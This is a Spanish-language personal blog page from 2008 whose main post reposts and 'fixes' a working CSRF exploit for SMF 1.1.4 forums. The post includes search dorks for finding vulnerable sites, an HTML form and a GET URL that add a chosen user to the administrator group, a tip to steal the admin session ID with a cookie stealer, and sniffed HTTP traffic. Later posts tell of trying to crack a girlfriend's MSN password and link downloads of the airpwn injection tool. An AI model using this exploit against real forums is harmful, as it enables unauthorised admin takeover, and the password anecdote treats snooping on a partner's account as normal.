miércoles, 30 de enero de 2008

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| *************** ||
|| Author: phAnt0mh4ck3r ||
|| ************************* ||
|| SMF 1.1.4 - Add User In Group [CSRF] ||
|| ________________________________________________________________ ||
|_________________________________________________________________________


ahora lo pongo por la explicacion de aqui abajo :-P

Bueno platicando con Em3Trix me dijo que no le funcionaba y demas entonces cheke el code que ponen aqui lo revise un poco y vi que no daba por que no ponia nada de usuario, generalmente saben que lo hace para evitar un copy paste (o scriptkiddies :-P) :P entonces bueno dije veamos que pasa y que falta puse mi backtrack, y dos maquinas en lindows una de ellas en vmware, me conecte a mi red local y en una tenia montado smf, en la otra de lindows era donde hiba a hacer los cambios y en la de backtrack es donde iba a snnifear que es como se sacan los CSRF (snnifeando) :P ok puse mi ettercap en accion xD y el resultado fue esto:


POST /smf/index.php?action=profile2 HTTP/1.1.
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*.
Referer: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Accept-Language: es.
Content-Type: application/x-www-form-urlencoded.
Accept-Encoding: gzip, deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1).
Host: 192.168.1.64.
Content-Length: 260.
Connection: Keep-Alive.
Cache-Control: no-cache.
Cookie: PHPSESSID=0585e394dfabf69c18a586d91b93ae84; SMFCookie956=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%22596fe11e6a4ac2039e5d80c345060d6c5b1dcbd8%22%3Bi%3A2%3Bi%3A1390709326%3Bi%3A3%3Bi%3A0%3B%7D.
.
realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1 302 Found.
Date: Mon, 28 Jan 2008 04:09:50 GMT.
Server: Apache/2.2.4 (Win32) PHP/5.2.3.
X-Powered-By: PHP/5.2.3.
Expires: Thu, 19 Nov 1981 08:52:00 GMT.
Cache-Control: private.
Pragma: no-cache.
Location: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Content-Encoding: gzip.
Vary: Accept-Encoding.
Content-Length: 26.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
Content-Type: text/html.


no pongo todo el resultaod si no solo lo mas importante :-P

en la parte de:

realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1

ahi se ve lo primero quees realName entonces ya le dije a Em3Trix que esa era la unica parte que faltaba y la agregara en el code y quedaria asi:

(se agrego esa parte por que es el identificador de usuario, tal vez tambine se pueda con el id de registro del user :-) )

< h t m l >
< h e a d >
< b o d y >
< action="http://localhost/foro/index.php?action=membergroups;sa=members;group=1;realName=Em3Trix" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>


donde realName sera el nombre del usuario que quieren elevar los privilegios y el group=1 es el grupo de administradores

entonces ahi tienen para que les funcione bien y sin problemas :-)

Saludos

Komtec1

viernes, 18 de enero de 2008

Superacion Personal

Bueno aqui un poco mas de la historia de mi vida :-D aqui vamos espero no aburrirlos jejej como en los otros posts que he puesto :-P yaque este por lo que veo sera un poco largo, si lo leen todo dejen un comentario jejeje :-P

El comienzo

1o (Primero) de junio del 2006

Muahahahaha tengo el pass del msn de mi novia encriptado en hexadecimal, lo unico malo es que no secomo hacer para "descifrar" eso, vamos a buscar en internet, O aqui hay una pagina que se ve interesante, vamos a entrar.

Se ve que si ayudan a la gente, hay muchos usuario que ayudan y demas :-O genial me voy a registrar para preguntarles haber si saben como "descifrar" el pass en hexa

---------------------------------------------------------------
Nota:
Lo tenia en hexadecimal por que mi novia guardaba el pass en su pc, entonces quedaba guardado en el registro de lindows...
---------------------------------------------------------------

Pregunta:

Alguien me puede ayudar en descifrar esto:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

es el pass de un msn que lo saque del regedit y pss no tengo ni ideade como hacerlo...

Respuesta:

no msn es de lammers

Pensamiento:

pero pero pero no es msn es un hexa..... weno ya que :-P

en una de esas veo en un post el titulo de un user:

Clan PRHackers Union

:-O :-O :-O yo quiero estar en un clan de hackers

ese mismo dia mando un mp al usuario que tenia ese titulo:

Hola puedo entrar a su clan??? que hago??? que necesito???

Respuesta:

No psss lo unico es aprender y no se pide se da, si vemos que sabes te metemos, tu solo dedicate aaprender

Pensamiento:

weno pss si tienen razon....

Pasa el tiempo aprendo y demas, consigo mi titulo de Clan PRHackers Union pfff que felicidad jejejej :-D

El Intermedio

(2006 Mediados de Agosto)
weno paso el tiempo y conoci a _ANtrAX_ un bune amigo hasta la fecha, pasael tiempo y un dia me dice voy a dar ponencia a México en Tuxtla Gutierrez y yo asi de :-O genial ya quisiera dar una ponencia yo pero no se ni madres xD cuando estubo aqui en México recuerdo le comente pfff ami me faltan años para que pueda dar una ponencia....

(2007 Mediados de Febrero)
despues pasa algo mas de tiempo y conosco a AzRaEL amigo hasta la fecha tambien y me dice pss voy a dar una ponencia en el CONSOL si quieres ahi nos conocemos y yo asi de nuevo :-O quisiera dar una ponencia tambien :'(

El Final ( De este post no de la historia, a esto aun le faltan años (espero) jejej :-D)

(2007 Mediados de Agosto)
weno pasa mas tiempo aun y el 2007 un amigo me recomienda para dar ponencia en Tuxtla Gutierrez donde el año pasado antrax dio una ponencia, mando mis papeles y todo y psss doy un taller en tuxtla gutierrez :-D pffff que felicidad me dio ese dia :-D

regreso y todo y un amigo me comenta que ya a va a ser el CONSOL y digo ahhh caray yo recuerdo ese nombre de donde de donde, ahhhh si ya ya ya, y me dice por que no mandas tu solicitud haber si la aceptan, con un poco mas de confianza en mi digo pss bueno nada pierdo, mando mi solicitud y demas y ahora me responden que mi ponencia esta a punto de ser aceptada y que solo mande mis docs para que los revisen :-D

jojojojo y llega el momento en que me siento feliz y veo que he ocupado mi tiempo en algo de provecho y pss como siempre he dicho de auqi en adelante mas aun, aun hay muchas muchisisisisissisismas cosas que me faltan por aprender y pss a eso voy primero Dios :-D

Komtec1

martes, 15 de enero de 2008

jajajajaja luove xD

Todo comenzo un miercoles (era martes me equivoque al poner esto cada dia estoy mas loco xD) por la noche cuando estaba en el departamento xD sentado en la pc escuchando música.....

personajes:

YO - Y
CHAVA - C
SEÑORA - S
Lo que se pone entre parentesis son pensamientos xD

tiiiiiiiiiin tiiiiiiiiiiin suena el timbre
Y: Que weba quien sera??? nadie me busca a estas horas de la noche y menos entre semana
Se escuchan voces afuera...
Me asomo por la ventana y veo a una señora bajando con su hija por las escaleras, supongo yo quien habia tocado el timbre de la puerta....
Abro la puerta y la señora y su hija ya estaban en el piso de abajo, voltean a verme...
Y: Buenas noches
C: Si esta mamá
C: Buenas noches
S: Buenas noches
S: Psss dile tu hija
Y: (pensando a caray que onda 0.o)
C: (Se acerca) Hola
Y: Hola
C: ahhh es que lo que pasa
Y (ahhh caray que onda ¿'? me declarara su amor? xD jajajaaja xD me dira que le baje a la musica, queme dira que me dira??????? y ahorita?????? a las 10 de la noche??? por que vienen ahorita, por que me ve asi, que onda, que pasa, por que llevo pensando como 5 minutos, creo que tengo una lucha en mi cabeza xD todo pasa por mi cabeza, ya ya va a hablar, ya me va a decir algo, callate para que la puedas escuchar tonto!)
C: venia por el dinero de la luz del edificio
Y: (jajajajajajajajajajajajajjaajajajaajajajajajajajajajajajajajaja)
C: son
Y: (jajajajajajajajajaajjajaajaajajajajajjajaajajajajaj
C: treinta
Y: (juajuajuajaujauajuajuajuajuajauajaujau yo imaginandome tirado en el piso riendo jajajajajajaajajajaj)
C: pesos
Y: ahh claro esperame tantito ya los traigo :-D
C: ok ^^
Y: (rumbo al cuarto pensando en jajajajajajajaajjajajajajaaajajajajajaajajajaja)
Y: aqui tienes :-D
C: esperame te doy tu cambio
Y: ok :-D
C: bye bye ^^
Y: (:O y esos ojos que hizo??? :O :O :O :O :O :O por que fue eso, que onda le gustare??? naaa no creo, o igual y si, es de noche y no me ve tan feo jajajajaj xD) nos vemos cuidate :-)
Y: Buenas noches señora
S: Buenas noches hijo
Y: (hijo???? por que me dicee hijo???? ahh caray, cada dia estoy mas paranoico xD)
Y: Cierro la puerta
Y: Hay hay cada dia estoy peor jajaj xD

jajajajajaj sicreo que cada dia estoy un poco mas loco xDDDDD

Komtec1

domingo, 6 de enero de 2008

airpwn

Bueno aqui el video de como usar airpwn, viene una explicacion rapida dentro del video, pronto hare un tuto completo, mientras aqui tienen el video :-D

http://www.mediafire.com/?9hpdxd5jhnd tar

http://www.mediafire.com/?4djjbxdmjku rar

http://www.mediafire.com/?f2ovkznbcyo airpwn 1.3

Saludos

Komtec1